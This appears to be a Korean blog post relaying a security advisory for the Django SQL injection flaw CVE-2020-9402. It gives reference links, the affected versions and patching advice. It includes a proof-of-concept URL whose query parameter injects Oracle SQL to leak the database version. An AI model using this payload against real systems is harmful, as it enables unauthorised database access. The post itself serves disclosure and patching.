티스토리 뷰

728x90
반응형

[CVE 취약점] Django 제품 SQL Injection 취약점(CVE-2020-9402)


참조

https://xz.aliyun.com/t/7403

https://christa.top/details/53/

https://twitter.com/chybeta/status/1241907287217729538

https://www.krcert.or.kr/data/secNoticeView.do?bulletin_writing_sequence=35301


Poc 

http://localhost:8000/test/?q=20) = 1 OR (select utl_inaddr.get_host_name((SELECT version FROM v%24instance)) from dual) is null%20 OR (1%2B1
  -> http://localhost:8000/test/?q=20) = 1 OR (select utl_inaddr.get_host_name((SELECT version FROM v$instance)) from dual) is null  OR (1+1


개요

최근 Django*에서 SQL Injection취약점(CVE-2020-9402)을 악용할 수 있는 개념증명코드(Proof of concept, PoC)가 인터넷상에 공개되어 사용자의 보안 업데이트 필요

     * Django : 파이썬으로 제작된 오픈소스 웹 어플리케이션 프레임워크


Django 제품에서 특정함수(GIS)의 인자값 검증이 미흡하여 발생하는 SQL Injection 취약점(CVE-2020-9402)


영향 받는 제품 버전

Django 1.11

Django 2.2

Django 3.0


방안

참고사이트(Django 홈페이지)의 “News&Events” 부분을 참고하여 패치 적용

728x90
반응형
댓글
250x250
공지사항
최근에 올라온 글
최근에 달린 댓글
Total
Today